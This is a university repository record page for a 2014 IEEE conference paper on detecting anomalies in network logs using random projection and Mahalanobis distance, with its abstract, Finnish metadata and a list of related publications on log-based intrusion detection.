An Efficient Network Log Anomaly Detection System using Random Projection Dimensionality Reduction
Juvonen, A., & Hämäläinen, T. (2014). An Efficient Network Log Anomaly Detection System using Random Projection Dimensionality Reduction. In M. Badra, & O. Alfandi (Eds.), 2014 6th International Conference on New Technologies, Mobility and Security (NTMS) : Proceedings of NTMS'2014 Conference and Workshops. IEEE. https://doi.org/10.1109/NTMS.2014.6814006
Päivämäärä
2014Tekijänoikeudet
© IEEE. This is the authors’ postprint version of the article. The original print
version is available online at http://ieeexplore.
ieee.org/stamp/stamp.jsp?tp=&arnumber=6814006&isnumber=6813963
Network traffic is increasing all the time and
network services are becoming more complex and vulnerable.
To protect these networks, intrusion detection systems are used.
Signature-based intrusion detection cannot find previously unknown
attacks, which is why anomaly detection is needed.
However, many new systems are slow and complicated. We
propose a log anomaly detection framework which aims to
facilitate quick anomaly detection and also provide visualizations
of the network traffic structure. The system preprocesses network
logs into a numerical data matrix, reduces the dimensionality
of this matrix using random projection and uses Mahalanobis
distance to find outliers and calculate an anomaly score for
each data point. Log lines that are too different are flagged as
anomalies. The system is tested with real-world network data, and
actual intrusion attempts are found. In addition, visualizations are
created to represent the structure of the network data. We also
perform computational time evaluation to ensure the performance
is feasible. The system is fast, finds real intrusion attempts and
does not need clean training data.
...
Julkaisija
IEEEEmojulkaisun ISBN
978-1-4799-3223-8Konferenssi
IFIP International Conference on New Technologies, Mobility and SecurityKuuluu julkaisuun
2014 6th International Conference on New Technologies, Mobility and Security (NTMS) : Proceedings of NTMS'2014 Conference and WorkshopsJulkaisu tutkimustietojärjestelmässä
https://converis.jyu.fi/converis/portal/detail/Publication/23636414
Metadata
Näytä kaikki kuvailutiedotKokoelmat
Samankaltainen aineisto
Näytetään aineistoja, joilla on samankaltainen nimeke tai asiasanat.
-
Dimensionality reduction framework for detecting anomalies from network logs
Sipola, Tuomo; Juvonen, Antti; Lehtonen, Joel (CRL Publishing, 2012)Dynamic web services are vulnerable to multitude of intrusions that could be previously unknown. Server logs contain vast amounts of information about network traffic, and finding attacks from these logs improves the ... -
Anomaly detection from network logs using diffusion maps
Sipola, Tuomo; Juvonen, Antti; Lehtonen, Joel (Springer, 2011)The goal of this study is to detect anomalous queries from network logs using a dimensionality reduction framework. The fequencies of 2-grams in queries are extracted to a feature matrix. Dimensionality reduction is done ... -
Adaptive framework for network traffic classification using dimensionality reduction and clustering
Juvonen, Antti; Sipola, Tuomo (IEEE, 2012)Information security has become a very important topic especially during the last years. Web services are becoming more complex and dynamic. This offers new possibilities for attackers to exploit vulnerabilities by inputting ... -
Online anomaly detection using dimensionality reduction techniques for HTTP log analysis
Juvonen, Antti; Sipola, Tuomo; Hämäläinen, Timo (Elsevier BV * North-Holland; International Council for Computer Communications, 2015)Modern web services face an increasing number of new threats. Logs are collected from almost all web servers, and for this reason analyzing them is beneficial when trying to prevent intrusions. Intrusive behavior often ... -
Anomaly-based online intrusion detection system as a sensor for cyber security situational awareness system
Kokkonen, Tero (University of Jyväskylä, 2016)Almost all the organisations and even individuals rely on complex structures of data networks and networked computer systems. That complex data ensemble, the cyber domain, provides great opportunities, but at the same ...
Ellei toisin mainittu, julkisesti saatavilla olevia JYX-metatietoja (poislukien tiivistelmät) saa vapaasti uudelleenkäyttää CC0-lisenssillä.